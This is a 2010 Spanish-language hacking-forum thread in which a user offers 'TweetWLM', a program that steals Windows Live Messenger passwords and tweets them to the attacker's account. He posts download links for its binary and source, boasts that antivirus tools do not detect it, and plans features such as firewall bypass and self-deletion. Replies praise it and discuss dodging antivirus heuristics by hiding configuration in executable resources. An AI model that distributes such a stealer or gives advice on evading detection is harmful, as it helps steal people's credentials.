Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: Karcrack en 12 Julio 2010, 03:15 AM

Título: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Karcrack en 12 Julio 2010, 03:15 AM
Bueno, TweetWLM, como yo lo he bautizado, es una simple aplicacion programada por mi que recupera las contraseñas del WLM y las Tweetea en tu Twitter >:D >:D Es recomendable tener un twitter cerrado al publico para ese uso ::)

Es FUD:
http://www.virustotal.com/es/analisis/f34627c59552a4c0f721786488a3af25a85b6d9cdbb0f5f675621f8c471fdeea-1278896349
Estoy al corriente de que VT comparte las muestras, pero no me preocupa, cualquiera que tenga idea sobre programacion es capaz de hacer FUD el codigo de nuevo ;)

Descargar:
Bin:
http://www.box.net/shared/a8vpqkp5mf
Src:
http://www.box.net/shared/pozkqp2n7f

El codigo y el binario pertenecen unicamente al STUB asi que para establecer la cuenta de twitter donde se postearan las contraseñas teneis que seguir estas instrucciones:
Ejemplo:
(http://img197.imageshack.us/img197/6676/dibujovaj.th.jpg) (http://img197.imageshack.us/i/dibujovaj.jpg/)

No se si queda muy claro este post, pero tengo sueño, asi que buenas noches :xD
Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Jaixon Jax en 12 Julio 2010, 03:41 AM
  Woooow Karcrack valla aportazo   ;D


  Descargando Source  :silbar: .......
Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: [Zero] en 12 Julio 2010, 13:45 PM
Muy bueno, no viste el partido o que?  :xD. Me bajo el source a ver si entiendo algo, sino me los explicas por MSN  ;D.

Saludos
Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Karcrack en 12 Julio 2010, 14:17 PM
Cita de: [Zero] en 12 Julio 2010, 13:45 PM
Muy bueno, no viste el partido o que?  :xD. Me bajo el source a ver si entiendo algo, sino me los explicas por MSN  ;D.

Saludos
Claro que lo vi ::) ::) ::) ::) ::)
Esto lo tenia hecho hacia tiempo... y para celebrar que gano la roja lo he compartido con todos :)
Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: [L]ord [R]NA en 12 Julio 2010, 17:46 PM
:xD vaya aporte.
Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Karcrack en 12 Julio 2010, 20:44 PM
Tengo pensado para futuras versiones:

Saludos ;)
Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Horricreu en 12 Julio 2010, 22:20 PM
Luego voy a probarlo que tengo muchas ganas ;D Parece muy interesante...

Cita de: Karcrack en 12 Julio 2010, 20:44 PM
Tengo pensado para futuras versiones:

  • Añadir builder
  • Codificar usuario y contraseña del Twitter... eso de que este en texto plano no me mola nada..  pero soy muy vago :xD
  • Optimizar la compilacion del ejecutable... ya que son 20kb de stub... y se puede dejar tranquilamente en 9kb ;D
  • FWB
  • Melt
  • Mutex
  • Me estoy planteando continuar el proyecto en C :-\...

Saludos ;)

Me gusta la última idea ;-) ;D

Saludos :P
Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Elemental Code en 14 Julio 2010, 21:26 PM
me gusto la idea de poner los datos en los comentarios del exe.

con eso te sacas de ensima la heuristica de los av cuando detectan que te abris a vos mismo.

Muy bueno, ya veo el codigo.




esteeeee...

me trabe.
quise armar un builder y me di cuenta de que no tengo ni idea de como cambiar la informacion del ejecutable...

voy a googlear, si alguien sabe me avisa?
Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: [Zero] en 15 Julio 2010, 14:30 PM
La información está en el resource, tienes que utilizar las API's de manejo de recursos para encontrar leer y/o cambiar el valor.

Saludos